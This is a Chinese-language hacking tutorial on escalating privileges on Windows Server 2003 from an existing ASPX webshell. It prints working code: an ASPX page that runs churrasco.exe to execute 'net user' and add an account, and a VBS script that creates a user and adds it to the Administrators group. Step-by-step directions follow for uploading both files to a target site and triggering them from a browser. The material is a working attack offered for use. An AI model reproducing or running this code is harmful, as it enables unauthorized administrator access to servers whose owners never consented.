使用 Aspx下03系统0day的提权方法的提权成功率非常高.可是需要满足一下条件
        1.webshell支持aspx
        2.能执行cmd命令
        3.系统盘有可写可读目录
        需要使用到的工具有 
        1.churrasco.exe 或者 pr.exe
        2.0day.aspx
        3.adduser.vbs
        下面是.0day.aspx的代码

 

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo. 
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user 用户 密码 /add\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
%>

使用方法：

        1.修改0day.aspx脚本中需要添加的帐号和密码 
        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        2.上传churrasco.exe和0day.aspx到网站的程序目录
        3.然后在浏览器访问0day.aspx文件

 比如 目标沾站点是 www.exehack.net 0day.aspx上传到了网站根目录
        那么我们直接访问http://www.exehack.net/0day.aspx 即可添加了帐号密码。 然后没有添加即不可用。

 

---

如果前面的方法提权不成功,那么有可能是管理员将net net1删除或者没有权限 那么即可用到以下方法:
        这里要用到一个vbs的脚本 脚本代码如下

 

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","用户名")
od.SetPassword "密码"
od.SetInfo
Set of=GetObject(os&"/用户",user)
oe.add os&"/用户"

这里还是需要修改一些自己设置的用户名和密码。

然后还需要将来下ASPX oday代码里面的

        myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
        修改为：
        myP.StartInfo.Arguments= ” \”adduser.vbs的绝对路径\” “; 
        比如路径是C:\Inetpub\wwwroot\adduser.vbs ‘注意：这里修改把绝对路径中的\ 修改为 /
        比如 C:/Inetpub/wwwroot/adduser.vbs
        然后最后的修改结果就是
        myP.StartInfo.Arguments= ” \”C:/Inetpub/wwwroot/adduser.vbs\” “;
        全部修改完成以后 还是在浏览器访问0day.aspx文件

        
        这里需要注意的是,这种方法细节非常重要 如果大家测试没成功可以根据以上方法多尝试几次。​